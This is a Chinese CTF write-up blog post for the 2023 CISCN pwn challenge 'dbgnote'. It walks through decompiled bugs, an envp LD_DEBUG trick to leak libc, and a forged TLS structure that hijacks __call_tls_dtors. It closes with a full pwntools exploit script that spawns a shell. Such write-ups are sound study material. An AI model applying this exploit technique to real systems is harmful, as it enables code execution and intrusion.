<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="2023-ciscn-pwn复现, StarrySky">
    <meta name="description" content="Love rises from the east and descends to the west,romance makes no changes until death.">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>2023-ciscn-pwn复现 | StarrySky</title>
    <link rel="icon" type="image/jpeg" href="/favicon.jpg">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="StarrySky" type="application/atom+xml">
</head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.jpg" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">StarrySky</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>主页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>文章</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>个人简介</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友链</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.jpg" class="logo-img circle responsive-img">
        
        <div class="logo-name">StarrySky</div>
        <div class="logo-desc">
            
            Love rises from the east and descends to the west,romance makes no changes until death.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			主页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			文章
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			个人简介
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友链
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/Steel%20Gray.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">2023-ciscn-pwn复现</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/heap/">
                                <span class="chip bg-color">heap</span>
                            </a>
                        
                            <a href="/tags/oob/">
                                <span class="chip bg-color">oob</span>
                            </a>
                        
                            <a href="/tags/envp/">
                                <span class="chip bg-color">envp</span>
                            </a>
                        
                            <a href="/tags/tls/">
                                <span class="chip bg-color">tls</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/pwn/" class="post-category">
                                pwn
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2023-08-03
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    3.6k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    19 分
                </div>
                

                
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h2 id="dbgnote"><a href="#dbgnote" class="headerlink" title="dbgnote"></a>dbgnote</h2><p>这题…复现的让我觉得我没学过<code>pwn</code></p>
<p>漏洞点：</p>
<pre class="line-numbers language-C" data-language="C"><code class="language-C">  while ( 1 )
  &#123;
LABEL_6:
    v5 &#x3D; aNoteAdd;
    v6 &#x3D; 0;
    sub_1B20(&amp;userName);
    read_input(buf, 0x32LL);                    &#x2F;&#x2F;overflow
    while ( strcmp(buf, v5) )
    &#123;
      ++v6;
      v5 +&#x3D; 16;
      if ( v6 &#x3D;&#x3D; 6 )
      &#123;
        puts(&quot;Error.&quot;);
        goto LABEL_6;
      &#125;
    &#125;
    call_func[v6]();
  &#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-C" data-language="C"><code class="language-C">__int64 input_vuln()
&#123;
  __int128 vars0; &#x2F;&#x2F; [rsp+0h] [rbp+0h] BYREF
  __int64 vars10; &#x2F;&#x2F; [rsp+10h] [rbp+10h]
  unsigned __int64 vars18; &#x2F;&#x2F; [rsp+18h] [rbp+18h]

  vars18 &#x3D; __readfsqword(0x28u);
  vars0 &#x3D; 0LL;
  vars10 &#x3D; 0LL;
  read_input(&amp;vars0, 25LL);                     &#x2F;&#x2F; off-by-one
  return strtol(&amp;vars0, 0LL, 10);
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-C" data-language="C"><code class="language-C">unsigned __int64 __fastcall super_note()
&#123;
  __int16 v1; &#x2F;&#x2F; sp
  unsigned __int64 v2; &#x2F;&#x2F; [rsp+8h] [rbp-10h]

  v2 &#x3D; __readfsqword(0x28u);
  puts(&quot;Please don&#39;t patch this normal function, we will check it!&quot;);
  if ( !super_flag )
  &#123;
    super_flag &#x3D; 1;
    __printf_chk(1LL, &quot;Super note: %d\n&quot;, (v1 + 4));	&#x2F;&#x2F;leak addr
  &#125;
  return v2 - __readfsqword(0x28u);
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>同时存在一个可以实现任意地址读写的函数</p>
<pre class="line-numbers language-C" data-language="C"><code class="language-C">void __noreturn sub_1B70()
&#123;
  char *s[9]; &#x2F;&#x2F; [rsp+0h] [rbp+0h] BYREF

  s[1] &#x3D; __readfsqword(0x28u);
  puts(&quot;Please don&#39;t patch this normal function, we will check it!&quot;);
  puts(&quot;[+] Debug the note.&quot;);
  s[0] &#x3D; 0LL;
  __printf_chk(1LL, &quot;[Addr] &quot;);
  read(0, s, 8uLL);
  __printf_chk(1LL, &quot;[Read] &quot;);
  puts(s[0]);
  __printf_chk(1LL, &quot;[Addr] &quot;);
  read(0, s, 8uLL);
  __printf_chk(1LL, &quot;[Write] &quot;);
  read(0, s[0], 0x90uLL);
  exit(0);
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>然而在运行程序的时候只能加上<code>dbg</code>或<code>run</code>，泄露地址需要<code>run</code>函数，任意地址读写需要<code>dbg</code>函数，但存在<code>signal</code>机制</p>
<pre class="line-numbers language-C" data-language="C"><code class="language-C">unsigned int my_init()
&#123;
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  signal(6, handler);
  signal(14, over);
  return alarm(0x3Cu);
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><code>signal</code>函数的作用是设置信号处理函数。第一个参数是要处理的信号编号，第二个参数是指向信号处理函数的指针。信号处理函数是一个特殊的函数，用于在接收到指定信号时执行相应的操作。查了一下信号<code>6</code>是<code>SIGABRT</code>信号，即<code>abort</code>报错，那么只需要触发程序报错即可运行<code>dbg</code></p>
<p>接下来的操作就是向<code>envp</code>环境变量加入<code>LD_DEBUG=all</code>，触发报错会泄露<code>libc</code>同时还会运行<code>dbg</code>函数，获取<code>system</code>函数地址之后打<code>__call_tls_dtors</code>利用函数中的<code>call rax</code>执行<code>system</code>，但需要根据函数执行过程修改<code>tls</code>结构体</p>
<p>先写入<code>LD_DEBUG=all</code>，然后利用<code>super note</code>功能泄露栈的低位地址</p>
<pre class="line-numbers language-none"><code class="language-none">.data:0000000000004020                               ; char aNoteAdd[]
.data:0000000000004020 4E 6F 74 65 5F 41 64 64 00    aNoteAdd db &#39;Note_Add&#39;,0                ; DATA XREF: main+D1↑o
.data:0000000000004029 00 00 00 00 00 00 00          align 10h
.data:0000000000004030 4E 6F 74 65 5F 44 65 6C 65 74+aNoteDelete db &#39;Note_Delete&#39;,0
.data:000000000000403C 00 00 00 00                   align 20h
.data:0000000000004040 4E 6F 74 65 5F 57 72 69 74 65+aNoteWrite db &#39;Note_Write&#39;,0
.data:000000000000404B 00 00 00 00 00                align 10h
.data:0000000000004050 4E 6F 74 65 5F 52 65 61 64 00 aNoteRead db &#39;Note_Read&#39;,0
.data:000000000000405A 00 00 00 00 00 00             align 20h
.data:0000000000004060 4E 6F 74 65 5F 45 78 69 74 00 aNoteExit db &#39;Note_Exit&#39;,0
.data:000000000000406A 00 00 00 00 00 00             align 10h
.data:0000000000004070 2B 2B 2D 2D 2B 2B 2D 2D 00    db &#39;++--++--&#39;,0
.data:0000000000004079 00 00 00 00 00 00 00          align 20h
.data:0000000000004080 10 18 00 00 00 00 00 00       call_func dq offset add                 ; DATA XREF: main+D8↑o
.data:0000000000004088 10 19 00 00 00 00 00 00       dq offset delete
.data:0000000000004090 C0 19 00 00 00 00 00 00       dq offset write
.data:0000000000004098 80 1A 00 00 00 00 00 00       dq offset dbg_read
.data:00000000000040A0 80 14 00 00 00 00 00 00       dq offset my_exit
.data:00000000000040A8 B0 14 00 00 00 00 00 00       dq offset super_note
.data:00000000000040A8                               _data ends<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-python" data-language="python"><code class="language-python">r<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">b'UserName:'</span><span class="token punctuation">,</span> <span class="token string">b'LD_DEBUG=all'</span><span class="token punctuation">)</span>      <span class="token comment">#envp content</span>
r<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">b'Note $ '</span><span class="token punctuation">,</span> <span class="token string">b'++--++--'</span><span class="token punctuation">)</span>

r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b'Super note: '</span><span class="token punctuation">)</span>
leak <span class="token operator">=</span> <span class="token builtin">int</span><span class="token punctuation">(</span>r<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">5</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token number">10</span><span class="token punctuation">)</span>    <span class="token comment">#leak low addr</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><code>envp</code>的范围在从<code>envp</code>开始地址到<code>null</code>结束，而之前写入的地址与<code>envp</code>之间存在<code>null</code>，所以需要改指向<code>LD_DEBUG=all</code>的地址为<code>envp</code>能够识别到的地址，在输入功能的函数中存在两字节的溢出，刚好溢出到指向<code>LD_DEBUG=all</code>的低二位，发送地址时需要用<code>p16</code></p>
<pre class="line-numbers language-C" data-language="C"><code class="language-C">p &#x3D; b&#39;a&#39; * 0x30 + p16(leak + 0x1c)     #change low addr into envp
r.sendlineafter(b&#39;Note $ &#39;, p)<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>接下来利用<code>off-by-one</code>通过溢出触发报错来泄露<code>libc</code>地址并进入到<code>dbg</code></p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python">r<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">b'Note $ '</span><span class="token punctuation">,</span> <span class="token string">b'Note_Read'</span><span class="token punctuation">)</span>
r<span class="token punctuation">.</span>sendafter<span class="token punctuation">(</span><span class="token string">b'Index: '</span><span class="token punctuation">,</span> <span class="token string">b'a'</span> <span class="token operator">*</span> <span class="token number">0x19</span><span class="token punctuation">)</span>    <span class="token comment">#abort and leak libc</span>

r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'base: 0x'</span><span class="token punctuation">)</span>
libc_base <span class="token operator">=</span> <span class="token builtin">int</span><span class="token punctuation">(</span>r<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">16</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token number">16</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>最后就是利用任意地址写来劫持<code>__call_tls_dtors</code>了，这里要对<code>exit</code>函数进行调试，<code>exit-&gt;__run_exit_handlers-&gt;__call_tls_dtors</code></p>
<pre class="line-numbers language-none"><code class="language-none">  0x7ffff7c45d60 &lt;__call_tls_dtors&gt;       endbr64 
  0x7ffff7c45d64 &lt;__call_tls_dtors+4&gt;     push   rbp
  0x7ffff7c45d65 &lt;__call_tls_dtors+5&gt;     push   rbx
  0x7ffff7c45d66 &lt;__call_tls_dtors+6&gt;     sub    rsp, 8
  0x7ffff7c45d6a &lt;__call_tls_dtors+10&gt;    mov    rbx, qword ptr [rip + 0x1d301f]
► 0x7ffff7c45d71 &lt;__call_tls_dtors+17&gt;    mov    rbp, qword ptr fs:[rbx]
  0x7ffff7c45d75 &lt;__call_tls_dtors+21&gt;    test   rbp, rbp
  0x7ffff7c45d78 &lt;__call_tls_dtors+24&gt;    je     __call_tls_dtors+93                &lt;__call_tls_dtors+93&gt;
   ↓
  0x7ffff7c45dbd &lt;__call_tls_dtors+93&gt;    add    rsp, 8
  0x7ffff7c45dc1 &lt;__call_tls_dtors+97&gt;    pop    rbx
  0x7ffff7c45dc2 &lt;__call_tls_dtors+98&gt;    pop    rbp<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>这里需要绕过这个<code>je</code>继续执行下面的内容， 所以<code>rbp</code>指向的值要是<code>0</code>，<code>fs:[rbx]</code>表示<code>tls + rbx</code>地址中的内容为<code>0</code></p>
<pre class="line-numbers language-none"><code class="language-none">*RBX  0xffffffffffffffa8<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">pwndbg&gt; tls
tls : 0x7ffff7fb8740
pwndbg&gt; p&#x2F;x 0x7ffff7fb8740 + 0xffffffffffffffa8
$2 &#x3D; 0x7ffff7fb86e8<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>绕过之后就要去改<code>rax = system rdi = /bin/sh</code></p>
<pre class="line-numbers language-none"><code class="language-none">  0x7ffff7c45d84 &lt;__call_tls_dtors+36&gt;    mov    rax, qword ptr [rbp]
  0x7ffff7c45d88 &lt;__call_tls_dtors+40&gt;    ror    rax, 0x11
► 0x7ffff7c45d8c &lt;__call_tls_dtors+44&gt;    xor    rax, qword ptr fs:[0x30]<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p><code>rbp</code>指向的值已经被改成<code>0</code>了，执行<code>xor    rax, qword ptr fs:[0x30]</code>即执行将<code>fs:[0x30]</code>与<code>0</code>进行异或存到<code>rax</code>中，所以直接改<code>fs:[0x30]</code>指向<code>system</code>即可</p>
<pre class="line-numbers language-none"><code class="language-none">pwndbg&gt; tls
tls : 0x7ffff7fb8740
pwndbg&gt; p&#x2F;x 0x7ffff7fb8740 + 0x30
$6 &#x3D; 0x7ffff7fb8770<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>接下来计算指向<code>rdi</code>的地址，将对应地址内容改成<code>/bin/sh</code></p>
<pre class="line-numbers language-none"><code class="language-none">0x7ffff7c45d99 &lt;__call_tls_dtors+57&gt;    mov    rdi, qword ptr [rbp + 8]<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">pwndbg&gt; p&#x2F;x 0x7ffff7fb8740 + 0x30
$6 &#x3D; 0x7ffff7fb8770
pwndbg&gt; p&#x2F;x 0x7ffff7fb86f0 + 8
$7 &#x3D; 0x7ffff7fb86f8<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>最后在指向<code>call system</code>之后还要注意一个地址，<code>system-&gt;posix_spawn-&gt;__spawni-&gt;__spawnix-&gt;pthread_setcancelstate</code></p>
<pre class="line-numbers language-none"><code class="language-none">   0x7ffff7c9b76e &lt;pthread_setcancelstate+14&gt;    mov    rdx, qword ptr fs:[0x10]
   0x7ffff7c9b777 &lt;pthread_setcancelstate+23&gt;    test   rsi, rsi
   0x7ffff7c9b77a &lt;pthread_setcancelstate+26&gt;    je     pthread_setcancelstate+37               &lt;pthread_setcancelstate+37&gt;


► 0x7ffff7c9b77c &lt;pthread_setcancelstate+28&gt;    movzx  eax, byte ptr [rdx + 0x971]
   0x7ffff7c9b783 &lt;pthread_setcancelstate+35&gt;    mov    dword ptr [rsi], eax
   0x7ffff7c9b785 &lt;pthread_setcancelstate+37&gt;    mov    byte ptr [rdx + 0x971], dil
   0x7ffff7c9b78c &lt;pthread_setcancelstate+44&gt;    xor    eax, eax
   0x7ffff7c9b78e &lt;pthread_setcancelstate+46&gt;    ret    <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>这里的<code>rdx + 0x971</code>需要是一个有效地址且其中储存的内容也要是一个有效地址</p>
<pre class="line-numbers language-none"><code class="language-none">pwndbg&gt; tls
tls : 0x7ffff7fb8740
pwndbg&gt; p&#x2F;x 0x7ffff7fb8740 + 0x10
$9 &#x3D; 0x7ffff7fb8750<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>伪造的<code>tls</code>结构体满足以上四个条件即可成功<code>getshell</code></p>
<p>exp：</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>

context<span class="token punctuation">(</span>arch<span class="token operator">=</span><span class="token string">'amd64'</span><span class="token punctuation">,</span> os<span class="token operator">=</span><span class="token string">'linux'</span><span class="token punctuation">,</span> log_level<span class="token operator">=</span><span class="token string">'debug'</span><span class="token punctuation">)</span>

file_name <span class="token operator">=</span> <span class="token string">'./pwn'</span>

li <span class="token operator">=</span> <span class="token keyword">lambda</span> x <span class="token punctuation">:</span> <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'\x1b[01;38;5;214m'</span> <span class="token operator">+</span> <span class="token builtin">str</span><span class="token punctuation">(</span>x<span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'\x1b[0m'</span><span class="token punctuation">)</span>
ll <span class="token operator">=</span> <span class="token keyword">lambda</span> x <span class="token punctuation">:</span> <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'\x1b[01;38;5;1m'</span> <span class="token operator">+</span> <span class="token builtin">str</span><span class="token punctuation">(</span>x<span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'\x1b[0m'</span><span class="token punctuation">)</span>

context<span class="token punctuation">.</span>terminal <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string">'tmux'</span><span class="token punctuation">,</span><span class="token string">'splitw'</span><span class="token punctuation">,</span><span class="token string">'-h'</span><span class="token punctuation">]</span>

debug <span class="token operator">=</span> <span class="token number">0</span>
<span class="token keyword">if</span> debug<span class="token punctuation">:</span>
    r <span class="token operator">=</span> remote<span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token keyword">else</span><span class="token punctuation">:</span>
    r <span class="token operator">=</span> process<span class="token punctuation">(</span><span class="token punctuation">[</span>file_name<span class="token punctuation">,</span> <span class="token string">'run'</span><span class="token punctuation">]</span><span class="token punctuation">)</span>

elf <span class="token operator">=</span> ELF<span class="token punctuation">(</span>file_name<span class="token punctuation">)</span>
libc <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'./2.35/libc.so.6'</span><span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">dbg</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    gdb<span class="token punctuation">.</span>attach<span class="token punctuation">(</span>r<span class="token punctuation">)</span>

r<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">b'UserName:'</span><span class="token punctuation">,</span> <span class="token string">b'LD_DEBUG=all'</span><span class="token punctuation">)</span>      <span class="token comment">#envp content</span>
r<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">b'Note $ '</span><span class="token punctuation">,</span> <span class="token string">b'++--++--'</span><span class="token punctuation">)</span>

r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b'Super note: '</span><span class="token punctuation">)</span>
leak <span class="token operator">=</span> <span class="token builtin">int</span><span class="token punctuation">(</span>r<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">5</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token number">10</span><span class="token punctuation">)</span>    <span class="token comment">#leak low addr</span>

p <span class="token operator">=</span> <span class="token string">b'a'</span> <span class="token operator">*</span> <span class="token number">0x30</span> <span class="token operator">+</span> p16<span class="token punctuation">(</span>leak <span class="token operator">+</span> <span class="token number">0x1c</span><span class="token punctuation">)</span>     <span class="token comment">#change low addr into envp</span>
r<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">b'Note $ '</span><span class="token punctuation">,</span> p<span class="token punctuation">)</span>

r<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">b'Note $ '</span><span class="token punctuation">,</span> <span class="token string">b'Note_Read'</span><span class="token punctuation">)</span>
r<span class="token punctuation">.</span>sendafter<span class="token punctuation">(</span><span class="token string">b'Index: '</span><span class="token punctuation">,</span> <span class="token string">b'a'</span> <span class="token operator">*</span> <span class="token number">0x19</span><span class="token punctuation">)</span>    <span class="token comment">#abort and leak libc</span>

r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'base: 0x'</span><span class="token punctuation">)</span>
libc_base <span class="token operator">=</span> <span class="token builtin">int</span><span class="token punctuation">(</span>r<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">16</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token number">16</span><span class="token punctuation">)</span>

system_addr <span class="token operator">=</span> libc_base <span class="token operator">+</span> libc<span class="token punctuation">.</span>sym<span class="token punctuation">[</span><span class="token string">'system'</span><span class="token punctuation">]</span>
target <span class="token operator">=</span> libc_base <span class="token operator">+</span> <span class="token number">0x3b86e8</span>

r<span class="token punctuation">.</span>sendafter<span class="token punctuation">(</span><span class="token string">'[Addr] '</span><span class="token punctuation">,</span> p64<span class="token punctuation">(</span>libc_base<span class="token punctuation">)</span><span class="token punctuation">)</span>   <span class="token comment">#any valid addr</span>
r<span class="token punctuation">.</span>sendafter<span class="token punctuation">(</span><span class="token string">'[Addr] '</span><span class="token punctuation">,</span> p64<span class="token punctuation">(</span>target<span class="token punctuation">)</span><span class="token punctuation">)</span>

p1 <span class="token operator">=</span> p64<span class="token punctuation">(</span>target <span class="token operator">+</span> <span class="token number">0x8</span><span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>target <span class="token operator">+</span> <span class="token number">0x18</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">b'/bin/sh\x00'</span>  <span class="token comment">#jne and point to 0 and set rdi</span>
p1 <span class="token operator">=</span> p1<span class="token punctuation">.</span>ljust<span class="token punctuation">(</span><span class="token number">0x68</span><span class="token punctuation">,</span> <span class="token string">b'\x00'</span><span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>libc_base <span class="token operator">+</span> <span class="token number">0x3b8750</span> <span class="token operator">-</span> <span class="token number">0x971</span><span class="token punctuation">)</span>  <span class="token comment">#any valid addr stored valid addr </span>
p1 <span class="token operator">=</span> p1<span class="token punctuation">.</span>ljust<span class="token punctuation">(</span><span class="token number">0x88</span><span class="token punctuation">,</span> <span class="token string">b'\x00'</span><span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>system_addr<span class="token punctuation">)</span>   <span class="token comment">#rax = system xor 0(ebp)</span>

r<span class="token punctuation">.</span>sendafter<span class="token punctuation">(</span><span class="token string">'[Write] '</span><span class="token punctuation">,</span> p1<span class="token punctuation">)</span>

